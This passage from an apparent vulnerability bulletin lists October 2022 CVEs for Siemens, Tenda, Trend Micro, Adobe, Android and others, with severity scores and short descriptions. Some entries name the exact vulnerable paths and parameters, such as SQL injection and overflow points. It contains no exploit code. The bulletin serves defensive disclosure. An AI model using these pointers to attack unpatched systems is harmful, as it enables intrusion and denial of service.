siemens — ruggedcom_rm1224_firmware A vulnerability has been identified in RUGGEDCOM RM1224 LTE(4G) EU (All versions < V7.1.2), RUGGEDCOM RM1224 LTE(4G) NAM (All versions < V7.1.2), SCALANCE M804PB (All versions < V7.1.2), SCALANCE M812-1 ADSL-Router (Annex A) (All versions < V7.1.2), SCALANCE M812-1 ADSL-Router (Annex B) (All versions < V7.1.2), SCALANCE M816-1 ADSL-Router (Annex A) (All versions < V7.1.2), SCALANCE M816-1 ADSL-Router (Annex B) (All versions < V7.1.2), SCALANCE M826-2 SHDSL-Router (All versions < V7.1.2), SCALANCE M874-2 (All versions < V7.1.2), SCALANCE M874-3 (All versions < V7.1.2), SCALANCE M876-3 (EVDO) (All versions < V7.1.2), SCALANCE M876-3 (ROK) (All versions < V7.1.2), SCALANCE M876-4 (EU) (All versions < V7.1.2), SCALANCE M876-4 (NAM) (All versions < V7.1.2), SCALANCE MUM853-1 (EU) (All versions < V7.1.2), SCALANCE MUM856-1 (EU) (All versions < V7.1.2), SCALANCE MUM856-1 (RoW) (All versions < V7.1.2), SCALANCE S615 (All versions < V7.1.2), SCALANCE WAM763-1 (All versions >= V1.1.0), SCALANCE WAM766-1 (All versions >= V1.1.0), SCALANCE WAM766-1 6GHz (All versions >= V1.1.0), SCALANCE WAM766-1 EEC (All versions >= V1.1.0), SCALANCE WAM766-1 EEC 6GHz (All versions >= V1.1.0), SCALANCE WUM763-1 (All versions >= V1.1.0), SCALANCE WUM766-1 (All versions >= V1.1.0), SCALANCE WUM766-1 6GHz (All versions >= V1.1.0). Affected devices with TCP Event service enabled do not properly handle malformed packets. This could allow an unauthenticated remote attacker to cause a denial of service and reboot the device thus possibly affecting other network resources. 2022-10-11 8.6 CVE-2022-31766
MISC
siemens — simatic_et_200_sp_open_controller_cpu_1515sp_pc2_firmware A vulnerability has been identified in SIMATIC Drive Controller family (All versions < V2.9.2), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants) (All versions), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions < V21.9), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions < V4.5.0), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIPLUS variants) (All versions < V2.9.2), SIMATIC S7-1500 Software Controller (All versions < V21.9), SIMATIC S7-PLCSIM Advanced (All versions < V4.0). Affected products protect the built-in global private key in a way that cannot be considered sufficient any longer. The key is used for the legacy protection of confidential configuration data and the legacy PG/PC and HMI communication. This could allow attackers to discover the private key of a CPU product family by an offline attack against a single CPU of the family. Attackers could then use this knowledge to extract confidential configuration data from projects that are protected by that key or to perform attacks against legacy PG/PC and HMI communication. 2022-10-11 7.8 CVE-2022-38465
MISC
siemens — simatic_hmi_comfort_panels_firmware A vulnerability has been identified in SIMATIC HMI Comfort Panels (incl. SIPLUS variants) (All versions < V17 Update 4), SIMATIC HMI KTP Mobile Panels (All versions < V17 Update 4), SIMATIC HMI KTP1200 Basic (All versions < V17 Update 5), SIMATIC HMI KTP400 Basic (All versions < V17 Update 5), SIMATIC HMI KTP700 Basic (All versions < V17 Update 5), SIMATIC HMI KTP900 Basic (All versions < V17 Update 5), SIPLUS HMI KTP1200 BASIC (All versions < V17 Update 5), SIPLUS HMI KTP400 BASIC (All versions < V17 Update 5), SIPLUS HMI KTP700 BASIC (All versions < V17 Update 5), SIPLUS HMI KTP900 BASIC (All versions < V17 Update 5). Affected devices do not properly validate input sent to certain services over TCP. This could allow an unauthenticated remote attacker to cause a permanent denial of service condition (requiring a device reboot) by sending specially crafted TCP packets. 2022-10-11 7.5 CVE-2022-40227
MISC
siemens — solid_edge A vulnerability has been identified in Solid Edge (All Versions < SE2022MP9). The affected application contains an out of bounds write past the fixed-length heap-based buffer while parsing specially crafted DWG files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-17627) 2022-10-11 7.8 CVE-2022-37864
MISC
simple_cold_storage_management_system_project — simple_cold_storage_managment_system Simple Cold Storage Management System v1.0 is vulnerable to SQL Injection via /csms/admin/?page=user/manage_user&id=. 2022-10-11 7.2 CVE-2022-42230
MISC
simple_online_public_access_catalog_project — simple_online_public_access_catalog A vulnerability has been found in SourceCodester Simple Online Public Access Catalog 1.0 and classified as critical. This vulnerability affects unknown code of the file /opac/Actions.php?a=login of the component Admin Login. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210784. 2022-10-14 7.2 CVE-2022-3495
MISC
MISC
slack_morphism_project — slack_morphism Slack Morphism is a modern client library for Slack Web/Events API/Socket Mode and Block Kit. Debug logs expose sensitive URLs for Slack webhooks that contain private information. The problem is fixed in version 1.3.2 which redacts sensitive URLs for webhooks. As a workaround, people who use Slack webhooks may disable or filter debug logs. 2022-10-10 7.5 CVE-2022-39292
CONFIRM
MISC
sonicwall — global_management_system SonicWall GMS is vulnerable to file path manipulation, allowing an unauthenticated attacker to gain access to the web directory containing the application’s binaries and configuration files. 2022-10-13 7.5 CVE-2021-20030
CONFIRM
tenda — ac1206_firmware Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a stack overflow via the function formWifiBasicSet. 2022-10-12 7.5 CVE-2022-42079
MISC
tenda — ac1206_firmware Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a heap overflow via sched_start_time parameter. 2022-10-12 7.5 CVE-2022-42080
MISC
tenda — ac1206_firmware Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a stack overflow via sched_end_time parameter. 2022-10-12 7.5 CVE-2022-42081
MISC
traefik — traefik Traefik (pronounced traffic) is a modern HTTP reverse proxy and load balancer that assists in deploying microservices. There is a potential vulnerability in Traefik managing HTTP/2 connections. A closing HTTP/2 server connection could hang forever because of a subsequent fatal error. This failure mode could be exploited to cause a denial of service. There has been a patch released in versions 2.8.8 and 2.9.0-rc5. There are currently no known workarounds. 2022-10-11 7.5 CVE-2022-39271
MISC
CONFIRM
MISC
trendmicro — apex_one A forced browsing vulnerability in Trend Micro Apex One could allow an attacker with access to the Apex One console on affected installations to escalate privileges and modify certain agent groupings. Please note: an attacker must first obtain the ability to log onto the Apex One web console in order to exploit this vulnerability. 2022-10-10 9.1 CVE-2022-41746
MISC
MISC
trendmicro — apex_one An improper certification validation vulnerability in Trend Micro Apex One agents could allow a local attacker to load a DLL file with system service privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2022-10-10 7.8 CVE-2022-41747
MISC
MISC
trendmicro — apex_one An origin validation error vulnerability in Trend Micro Apex One agents could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2022-10-10 7.8 CVE-2022-41749
MISC
MISC
trendmicro — apex_one A Time-of-Check Time-Of-Use vulnerability in the Trend Micro Apex One Vulnerability Protection integrated component could allow a local attacker to escalate privileges and turn a specific working directory into a mount point on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2022-10-10 7 CVE-2022-41744
MISC
MISC
trendmicro — apex_one An Out-of-Bounds access vulnerability in Trend Micro Apex One could allow a local attacker to create a specially crafted message to cause memory corruption on a certain service process which could lead to local privilege escalation on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2022-10-10 7 CVE-2022-41745
MISC
MISC
vmware — vcenter_server The vCenter Server contains an unsafe deserialisation vulnerability in the PSC (Platform services controller). A malicious actor with admin access on vCenter server may exploit this issue to execute arbitrary code on the underlying operating system that hosts the vCenter Server. 2022-10-07 9.1 CVE-2022-31680
MISC
MISC
wayos — lq-09_firmware WAYOS LQ_09 22.03.17V was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to send crafted requests to the server from the affected device. This vulnerability is exploitable due to a lack of authentication in the component Usb_upload.htm. 2022-10-13 8.1 CVE-2022-41489
MISC
web-based_student_clearance_system_project — web-based_student_clearance_system A vulnerability classified as critical was found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-210367. 2022-10-09 7.5 CVE-2022-3436
MISC
webpack.js — loader-utils Prototype pollution vulnerability in function parseQuery in parseQuery.js in webpack loader-utils 2.0.0 via the name variable in parseQuery.js. 2022-10-12 9.8 CVE-2022-37601
MISC
MISC
MISC
webpack.js — loader-utils A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the resourcePath variable in interpolateName.js. 2022-10-11 7.5 CVE-2022-37599
MISC
MISC
MISC
wedding_planner_project — wedding_planner Wedding Planner v1.0 is vulnerable to arbitrary code execution. 2022-10-07 9.8 CVE-2022-42075
MISC
MISC
wedding_planner_project — wedding_planner Wedding Planner v1.0 is vulnerable to arbitrary code execution via users_profile.php. 2022-10-11 8.8 CVE-2022-42034
MISC
wedding_planner_project — wedding_planner Wedding Planner v1.0 is vulnerable to Arbitrary code execution via package_edit.php. 2022-10-11 8.8 CVE-2022-42229
MISC
wijungle — u250_firmware WiJungle NGFW Version U250 was discovered to be vulnerable to No Rate Limit attack, allowing the attacker to brute force the admin password leading to Account Take Over. 2022-10-12 9.8 CVE-2022-33106
MISC
MISC
woo_billingo_plus_project — woo_billingo_plus The Woo Billingo Plus WordPress plugin before 4.4.5.4, Integration for Billingo & Gravity Forms WordPress plugin before 1.0.4, Integration for Szamlazz.hu & Gravity Forms WordPress plugin before 1.2.7 are lacking CSRF checks in various AJAX actions, which could allow attackers to make logged in Shop Managers and above perform unwanted actions, such as deactivate the plugin’s license 2022-10-10 7.1 CVE-2022-3154
MISC
xmldom_project — xmldom A prototype pollution vulnerability exists in the function copy in dom.js in the xmldom (published as @xmldom/xmldom) package before 0.8.3 for Node.js via the p variable. 2022-10-11 9.8 CVE-2022-37616
MISC
MISC
MISC
MISC
zkteco — zkbiosecurity_v5000 An access control issue in ZKTeco ZKBioSecurity V5000 3.0.5_r allows attackers to arbitrarily create admin users via a crafted HTTP request. 2022-10-07 8.8 CVE-2022-36634
MISC
MISC
MISC
zkteco — zkbiosecurity_v5000 ZKteco ZKBioSecurity V5000 4.1.3 was discovered to contain a SQL injection vulnerability via the component /baseOpLog.do. 2022-10-07 8.8 CVE-2022-36635
MISC
MISC
MISC
zoneminder — zoneminder ZoneMinder is a free, open source closed-circuit television software application. In affected versions the ZoneMinder API exposes database log contents to users without privileges and allows insertion, modification, and deletion of logs without System privileges. Users are advised to upgrade as soon as possible. Users unable to upgrade should disable database logging. 2022-10-07 7.5 CVE-2022-39289
MISC
CONFIRM

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
adguard — adguardhome In AdGuardHome, versions v0.95 through v0.108.0-b.13 are vulnerable to Cross-Site Request Forgery (CSRF), in the custom filtering rules functionality. An attacker can persuade an authorized user to follow a malicious link, resulting in deleting/modifying the custom filtering rules. 2022-10-11 4.3 CVE-2022-32175
MISC
MISC
adobe — acrobat_reader Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 5.5 CVE-2022-35691
MISC
adobe — acrobat_reader Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 5.5 CVE-2022-38437
MISC
adobe — acrobat_reader Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 5.5 CVE-2022-38449
MISC
adobe — acrobat_reader Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 5.5 CVE-2022-42342
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in information disclosure. Exploitation of this issue does not require user interaction, but does require administrator privileges. 2022-10-14 4.9 CVE-2022-38423
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Restriction of XML External Entity Reference (‘XXE’) vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction. 2022-10-14 5.9 CVE-2022-38419
MISC
adobe — commerce Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the availability of a user’s minor feature. Exploitation of this issue does not require user interaction. 2022-10-14 5.3 CVE-2022-35689
MISC
adobe — dimension Adobe Dimension versions 3.4.5 is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 5.5 CVE-2022-38443
MISC
arubanetworks — instant An unauthenticated Denial of Service (DoS) vulnerability exists in the handling of certain SSID strings by Aruba InstantOS and ArubaOS 10. Successful exploitation of this vulnerability results in the ability to interrupt the normal operation of the affected AP of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address this security vulnerability. 2022-10-07 6.5 CVE-2022-37894
MISC
arubanetworks — instant A vulnerability in the Aruba InstantOS and ArubaOS 10 web management interface could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address this security vulnerability. 2022-10-07 6.1 CVE-2022-37896
MISC
arubanetworks — instant A vulnerability in the Aruba InstantOS and ArubaOS 10 web management interface could allow an unauthenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address this security vulnerability. 2022-10-07 5.4 CVE-2022-37892
MISC
arubanetworks — instant An unauthenticated Denial of Service (DoS) vulnerability exists in the handling of certain SSID strings by Aruba InstantOS and ArubaOS 10. Successful exploitation of this vulnerability results in the ability to interrupt the normal operation of the affected AP of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address this security vulnerability. 2022-10-07 4.9 CVE-2022-37895
MISC
asset_cleanup — _page_speed_booster_project Authenticated (admin+) Reflected Cross-Site Scripting (XSS) vulnerability in Gabe Livan’s Asset CleanUp: Page Speed Booster plugin <= 1.3.8.4 at WordPress. 2022-10-11 4.8 CVE-2021-36899
CONFIRM
CONFIRM
avaya — aura_communication_manager Privilege escalation related vulnerabilities were discovered in Avaya Aura Communication Manager that may allow local administrative users to escalate their privileges. This issue affects Communication Manager versions 8.0.0.0 through 8.1.3.3 and 10.1.0.0. 2022-10-12 6.7 CVE-2022-2249
CONFIRM
bevywise — mqttroute A cross-site scripting (XSS) vulnerability in MQTTRoute v3.3 and below allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the dashboard name text field. 2022-10-13 5.4 CVE-2022-35612
MISC
bevywise — mqttroute A Cross-Site Request Forgery (CSRF) in MQTTRoute v3.3 and below allows attackers to create and remove dashboards. 2022-10-13 4.3 CVE-2022-35611
MISC
boodskap — iot_platform Boodskap IoT Platform v4.4.9-02 allows attackers to make unauthenticated API requests. 2022-10-13 6.5 CVE-2022-35136
MISC
boodskap — iot_platform Boodskap IoT Platform v4.4.9-02 contains a cross-site scripting (XSS) vulnerability. 2022-10-13 5.4 CVE-2022-35134
MISC
book_store_management_system_project — book_store_management_system A vulnerability was found in SourceCodester Book Store Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /category.php. The manipulation of the argument category_name leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-210436. 2022-10-11 5.4 CVE-2022-3452
MISC
book_store_management_system_project — book_store_management_system A vulnerability was found in SourceCodester Book Store Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /transcation.php. The manipulation of the argument buyer_name leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-210437 was assigned to this vulnerability. 2022-10-11 5.4 CVE-2022-3453
MISC
brainvire — disable_user_login The Disable User Login WordPress plugin through 1.0.1 does not have authorisation and CSRF checks when updating its settings, allowing unauthenticated attackers to block (or unblock) users at will. 2022-10-10 5.3 CVE-2022-2350
MISC
cert — vince An HTML injection vulnerability exists in CERT/CC VINCE software prior to 1.50.4. An authenticated attacker can inject arbitrary HTML via form using the “Product Affected” field. 2022-10-10 5.4 CVE-2022-40248
MISC
cert — vince An HTML injection vulnerability exists in CERT/CC VINCE software prior to 1.50.4. An authenticated attacker can inject arbitrary HTML via a crafted email with HTML content in the Subject field. 2022-10-10 5.4 CVE-2022-40257
MISC
cisco — ios_xe A vulnerability in the software image verification functionality of Cisco IOS XE Software for Cisco Catalyst 9200 Series Switches could allow an unauthenticated, physical attacker to execute unsigned code at system boot time. This vulnerability is due to an improper check in the code function that manages the verification of the digital signatures of system image files during the initial boot process. An attacker could exploit this vulnerability by loading unsigned software on an affected device. A successful exploit could allow the attacker to boot a malicious software image or execute unsigned code and bypass the image verification check part of the boot process of the affected device. To exploit this vulnerability, the attacker needs either unauthenticated physical access to the device or privileged access to the root shell on the device. Note: In Cisco IOS XE Software releases 16.11.1 and later, root shell access is protected by the Consent Token mechanism. However, an attacker with level-15 privileges could easily downgrade the Cisco IOS XE Software running on a device to a release where root shell access is more readily available. 2022-10-10 6.8 CVE-2022-20944
CISCO
cisco — ios_xe_rom_monitor A vulnerability in the password-recovery disable feature of Cisco IOS XE ROM Monitor (ROMMON) Software for Cisco Catalyst Switches could allow an unauthenticated, local attacker to recover the configuration or reset the enable password. This vulnerability is due to a problem with the file and boot variable permissions in ROMMON. An attacker could exploit this vulnerability by rebooting the switch into ROMMON and entering specific commands through the console. A successful exploit could allow the attacker to read any file or reset the enable password. 2022-10-10 4.6 CVE-2022-20864
CISCO
cisco — sd-wan_vmanage A vulnerability in authentication mechanism of Cisco Software-Defined Application Visibility and Control (SD-AVC) on Cisco vManage could allow an unauthenticated, remote attacker to access the GUI of Cisco SD-AVC without authentication. This vulnerability exists because the GUI is accessible on self-managed cloud installations or local server installations of Cisco vManage. An attacker could exploit this vulnerability by accessing the exposed GUI of Cisco SD-AVC. A successful exploit could allow the attacker to view managed device names, SD-AVC logs, and SD-AVC DNS server IP addresses. 2022-10-10 5.3 CVE-2022-20830
CISCO
cozmoslabs — profile_builder Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder plugin <= 3.6.0 at WordPress allows uploading the JSON file and updating the options. Requires Import and Export add-on. 2022-10-11 4.3 CVE-2021-36915
CONFIRM
CONFIRM
crealogix — ebics_server A vulnerability was found in Crealogix EBICS 7.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /ebics-server/ebics.aspx. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 7.1 is able to address this issue. It is recommended to upgrade the affected component. VDB-210374 is the identifier assigned to this vulnerability. 2022-10-10 6.1 CVE-2022-3442
N/A
N/A
d-bus_project — d-bus An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash when receiving a message with certain invalid type signatures. 2022-10-10 6.5 CVE-2022-42010
CONFIRM
MISC
FEDORA
d-bus_project — d-bus An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash when receiving a message where an array length is inconsistent with the size of the element type. 2022-10-10 6.5 CVE-2022-42011
CONFIRM
MISC
FEDORA
d-bus_project — d-bus An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash by sending a message with attached file descriptors in an unexpected format. 2022-10-10 6.5 CVE-2022-42012
CONFIRM
MISC
FEDORA
dell — alienware_area_51m_r1_firmware Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable. 2022-10-12 4.4 CVE-2022-32483
MISC
dell — alienware_area_51m_r1_firmware Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable. 2022-10-12 4.4 CVE-2022-32484
MISC
dell — cloud_mobility_for_dell_emc_storage Cloud Mobility for Dell Storage versions 1.3.0 and earlier contains an Improper Access Control vulnerability within the Postgres database. A threat actor with root level access to either the vApp or containerized versions of Cloud Mobility may potentially exploit this vulnerability, leading to the modification or deletion of tables that are required for many of the core functionalities of Cloud Mobility. Exploitation may lead to the compromise of integrity and availability of the normal functionality of the Cloud Mobility application. 2022-10-11 6.7 CVE-2022-34434
MISC
dell — geodrive Dell GeoDrive, Versions 2.1 – 2.2, contains an information disclosure vulnerability. An authenticated non-admin user could potentially exploit this vulnerability and gain access to sensitive information. 2022-10-12 5.5 CVE-2022-33918
MISC
dell — hybrid_client Dell Hybrid Client versions below 1.8 contain a guest user profile corruption vulnerability. A WMS privilege attacker could potentially exploit this vulnerability, leading to the DHC system not being accessible. 2022-10-11 6.5 CVE-2022-34431
MISC
dell — wyse_thinos Dell Wyse ThinOS 2205 contains a Regular Expression Denial of Service Vulnerability in UI. An admin privilege attacker could potentially exploit this vulnerability, leading to denial-of-service. 2022-10-10 4.9 CVE-2022-34402
MISC
eng — knowage Knowage is an open source suite for modern business analytics alternative over big data systems. KnowageLabs / Knowage-Server starting with the 6.x branch and prior to versions 7.4.22, 8.0.9, and 8.1.0 is vulnerable to cross-site scripting because the `XSSRequestWrapper::stripXSS` method can be bypassed. Versions 7.4.22, 8.0.9, and 8.1.0 contain patches for this issue. There are no known workarounds. 2022-10-13 6.1 CVE-2022-39295
CONFIRM
MISC
fatfreecrm — fatfreecrm fat_free_crm is an open source, Ruby on Rails customer relationship management platform (CRM). In versions prior to 0.20.1 an authenticated user can perform a remote Denial of Service attack against Fat Free CRM via bucket access. The vulnerability has been patched in commit `c85a254` and will be available in release `0.20.1`. Users are advised to upgrade or to manually apply patch `c85a254`. There are no known workarounds for this issue. 2022-10-08 6.5 CVE-2022-39281
MISC
MISC
CONFIRM
flatpress — flatpress Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php. 2022-10-11 5.4 CVE-2022-40047
MISC
MISC
fontmeister_project — fontmeister Reflected Cross-Site Scripting (XSS) vulnerability FontMeister plugin <= 1.08 at WordPress. 2022-10-11 6.1 CVE-2022-33978
CONFIRM
CONFIRM
fortinet — fortimanager An exposure of resource to wrong sphere vulnerability [CWE-668] in FortiAnalyzer and FortiManager GUI 7.0.0 through 7.0.3, 6.4.0 through 6.4.8, 6.2.0 through 6.2.9, 6.0.0 through 6.0.11, 5.6.0 through 5.6.11 may allow an unauthenticated and remote attacker to access report template images via referencing the name in the URL path. 2022-10-10 5.3 CVE-2022-26121
CONFIRM
getshortcodes — shortcodes_ultimate Cross-Site Request Forgery (CSRF) vulnerability in Shortcodes Ultimate plugin <= 5.12.0 at WordPress leading to plugin preset settings change. 2022-10-11 4.3 CVE-2022-38086
CONFIRM
CONFIRM
gin-vue-admin_project — gin-vue-admin In “Gin-Vue-Admin”, versions v2.5.1 through v2.5.3beta are vulnerable to Unrestricted File Upload that leads to execution of javascript code, through the ‘Normal Upload’ functionality to the Media Library. When an admin user views the uploaded file, a low privilege attacker will get access to the admin’s cookie leading to account takeover. 2022-10-14 5.4 CVE-2022-32177
CONFIRM
MISC
gnu — osip GNU oSIP v5.3.0 was discovered to contain an integer overflow via the component osip_body_parse_header. 2022-10-11 6.5 CVE-2022-41550
MISC
google — android In io_identity_cow of io_uring.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-238177383. References: Upstream kernel. 2022-10-11 6.7 CVE-2022-20409
MISC
google — android In fdt_next_tag of fdt.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-12L Android-13. Android ID: A-230794395. 2022-10-11 6.7 CVE-2022-20412
MISC
google — android In isp, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07262305; Issue ID: ALPS07262305. 2022-10-07 6.7 CVE-2022-26452
MISC
google — android In vdec fmt, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07342197; Issue ID: ALPS07342197. 2022-10-07 6.7 CVE-2022-26473
MISC
google — android In sensorhub, there is a possible out of bounds write due to an incorrect calculation of buffer size. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07129717; Issue ID: ALPS07129717. 2022-10-07 6.7 CVE-2022-26474
MISC
google — android In wlan, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07310743; Issue ID: ALPS07310743. 2022-10-07 6.7 CVE-2022-26475
MISC
google — android In wlan, there is a possible use after free due to an incorrect status check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07299425; Issue ID: ALPS07299425. 2022-10-07 6.7 CVE-2022-32590
MISC
google — android In cpu dvfs, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07139405; Issue ID: ALPS07139405. 2022-10-07 6.7 CVE-2022-32592
MISC
google — android In vowe, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07138493; Issue ID: ALPS07138493. 2022-10-07 6.7 CVE-2022-32593
MISC
google — android In queryInternal of CallLogProvider.java, there is a possible access to voicemail information due to SQL injection. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-12L. Android ID: A-224771921. 2022-10-11 5.5 CVE-2022-20351
MISC
google — android In start of Threads.cpp, there is a possible way to record audio during a phone call due to a logic error in the code. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-12L Android-13. Android ID: A-235850634. 2022-10-11 5.5 CVE-2022-20413
MISC
google — android In addAutomaticZenRule of ZenModeHelper.java, there is a possible permanent degradation of performance due to resource exhaustion. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-12L Android-13. Android ID: A-235823407. 2022-10-11 5.5 CVE-2022-20425
MISC
google — android In Messaging, There has unauthorized broadcast, this could cause Local Deny of Service.Product: AndroidVersions: Android SoCAndroid ID: A-242258929 2022-10-11 5.5 CVE-2022-20437
MISC
google — android In Messaging, There has unauthorized broadcast, this could cause Local Deny of Service.Product: AndroidVersions: Android SoCAndroid ID: A-242259920 2022-10-11 5.5 CVE-2022-20438
MISC
google — android In Messaging, There has unauthorized provider, this could cause Local Deny of Service.Product: AndroidVersions: Android SoCAndroid ID: A-242266172 2022-10-11 5.5 CVE-2022-20439
MISC
